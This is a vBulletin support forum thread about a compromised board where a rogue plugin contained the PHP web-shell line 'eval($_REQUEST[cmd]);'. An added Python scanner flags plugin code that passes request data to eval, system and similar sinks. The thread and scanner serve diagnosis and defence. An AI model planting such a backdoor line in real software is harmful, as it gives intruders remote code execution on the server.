
jfxcube 08-01-2014 02:06 PM

Dangerous SQL injection vulnerability in 4:2:0?
 
This week we found a new plugin (we are still investigating "how") with this code:

Code:

eval($_REQUEST[cmd]);

Apparently, in the Apache logs and vBulletin logs there is nothing.

Do you know of any known issues about this vulnerability in vBulletin 4.2.0 l2?

Seems to be similar to this one:

http://www.pcworld.com/article/24555...erability.html
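
A defender-side check for the situation described in this post, as an added example that is not part of the original thread or vBulletin's own code: it scans plugin rows exported from the database for PHP that hands request data to eval or a command function, directly or through one intermediate variable. The column names (pluginid, hookname, phpcode) and the sample rows are assumptions constructed for illustration.

```python
import re

# Code/command execution sinks. PHP function names are case-insensitive.
SINK_OPEN = (r"(?<![\w$])(?i:eval|assert|system|exec|passthru|shell_exec|"
             r"popen|proc_open|create_function)\s*\("
             r"(?:(?!\)\s*;).)*?")  # stay inside this one call statement
SOURCE = r"\$_(?:REQUEST|GET|POST|COOKIE|FILES|SERVER)\b"
DIRECT = re.compile(SINK_OPEN + SOURCE, re.S)
# One-hop taint: $var = ... $_POST[...] ...; later eval(... $var ...)
ASSIGN = re.compile(r"(\$\w+)\s*=(?!=)[^;]*?" + SOURCE)


def scan_plugins(rows):
    """Return (pluginid, hookname, reason) for plugin code that feeds request data to a sink."""
    findings = []
    for row in rows:
        code = row["phpcode"]
        if DIRECT.search(code):
            findings.append((row["pluginid"], row["hookname"], "direct"))
            continue
        tainted = {m.group(1) for m in ASSIGN.finditer(code)}
        if any(re.search(SINK_OPEN + re.escape(v) + r"\b", code, re.S) for v in tainted):
            findings.append((row["pluginid"], row["hookname"], "indirect"))
    return findings


# Constructed sample rows (assumed column names); only 101 is the code from the post.
SAMPLE_ROWS = [
    {"pluginid": 101, "hookname": "global_start",
     "phpcode": "eval($_REQUEST[cmd]);"},
    {"pluginid": 102, "hookname": "init_startup",
     "phpcode": "$c = $_POST['k'];\nif ($c) { EVAL ( base64_decode($c) ); }"},
    # Benign: template eval plus a sanitised $_GET read, neither reaching a sink.
    {"pluginid": 103, "hookname": "global_start",
     "phpcode": "$page = intval($_GET['page']);\n"
                "eval('$nav = \"' . fetch_template('my_nav') . '\";');"},
]

if __name__ == "__main__":
    for pluginid, hook, reason in scan_plugins(SAMPLE_ROWS):
        print(f"plugin {pluginid} on hook {hook}: {reason} request-to-sink flow")
```

Row 103 shows why searching for eval alone is not enough: template evaluation in plugins uses it legitimately, so the check keys on request data reaching the call.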

Dave 08-01-2014 02:09 PM

This isn't present in vBulletin by default. It's a piece of code implemented by a hacker or someone who wants to do bad stuff.

jfxcube 08-01-2014 02:43 PM

I knew that... I'm just asking if there is some known vulnerability in vBulletin 4.2.0 l2 that lets bad guys do some SQL injection in tables like plugin, so that I can save time investigating by myself to find the exploit used to inject that code.

ForceHSS 08-01-2014 02:47 PM

We don't know what plugins you have or if you have the install folder still in your FTP, so it's hard to answer. The best way would be to get someone to log in and fix your problem if you don't know how to do it yourself.

Dave 08-01-2014 02:48 PM

As far as I know there is no public exploit for vBulletin 4.2+; a private exploit is always possible, or a vulnerable plugin.

Paul M 08-01-2014 02:49 PM

Quote:

Originally Posted by jfxcube (Post 2509294)
I'm just asking if there is some known vulnerability in vBulletin 4.2.0 l2 that lets bad guys do some SQL injection in tables like plugin.

No, there isn't.

Zachery 08-01-2014 03:36 PM

In 4.2? If you've left the install folder around, yes. If you haven't, no.

jfxcube 08-01-2014 05:19 PM

Quote:

Originally Posted by Zachery (Post 2509309)
In 4.2? If you've left the install folder around, yes. If you haven't, no.

It's the first thing I've deleted after finishing installing it.

